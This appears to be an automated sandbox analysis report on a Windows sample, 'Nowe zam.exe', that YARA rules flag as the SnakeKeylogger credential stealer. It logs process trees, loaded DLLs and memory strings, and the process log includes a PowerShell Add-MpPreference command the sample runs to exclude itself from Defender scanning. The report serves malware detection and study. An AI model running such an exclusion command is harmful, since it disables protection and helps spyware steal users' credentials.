Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BEF60	4_2_065BEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B178F	4_2_065B178F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BCCA0	4_2_065BCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BD550	4_2_065BD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B9548	4_2_065B9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BD540	4_2_065BD540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BDDFF	4_2_065BDDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BE24A	4_2_065BE24A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BEAF8	4_2_065BEAF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BEB08	4_2_065BEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B0B20	4_2_065B0B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B8B91	4_2_065B8B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BF3B8	4_2_065BF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B8BA0	4_2_065B8BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B0040	4_2_065B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B501B	4_2_065B501B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BF810	4_2_065BF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BF802	4_2_065BF802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B0006	4_2_065B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BD0F8	4_2_065BD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065B295B	4_2_065B295B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BD999	4_2_065BD999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_065BD9A8	4_2_065BD9A8

Source: Nowe zam.exe, 00000000.00000002.2339393029.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Nowe zam.exe
Source: Nowe zam.exe, 00000000.00000002.2348087529.0000000009400000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Nowe zam.exe
Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Nowe zam.exe
Source: Nowe zam.exe, 00000000.00000000.2304859558.0000000000258000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDuG.exe" vs Nowe zam.exe
Source: Nowe zam.exe, 00000000.00000002.2344204160.0000000002840000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Nowe zam.exe
Source: Nowe zam.exe, 00000000.00000002.2344766736.0000000003E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Nowe zam.exe
Source: Nowe zam.exe	Binary or memory string: OriginalFilenameDuG.exe" vs Nowe zam.exe

Source: Nowe zam.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Nowe zam.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, zjHVUkuQsImgZBRnqb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, rW4ijJCasbbw09ngCX.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, rW4ijJCasbbw09ngCX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, rW4ijJCasbbw09ngCX.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, zjHVUkuQsImgZBRnqb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, rW4ijJCasbbw09ngCX.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, rW4ijJCasbbw09ngCX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, rW4ijJCasbbw09ngCX.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, rW4ijJCasbbw09ngCX.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, rW4ijJCasbbw09ngCX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, rW4ijJCasbbw09ngCX.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, zjHVUkuQsImgZBRnqb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@6/5@4/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\Nowe zam.exe	Mutant created: \Sessions\1\BaseNamedObjects\sEzObf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgo1nvf3.pt1.ps1

Jump to behavior

Source: Nowe zam.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Nowe zam.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Nowe zam.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Nowe zam.exe

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Users\user\Desktop\Nowe zam.exe "C:\Users\user\Desktop\Nowe zam.exe"
Source: C:\Users\user\Desktop\Nowe zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"
Source: C:\Users\user\Desktop\Nowe zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Nowe zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

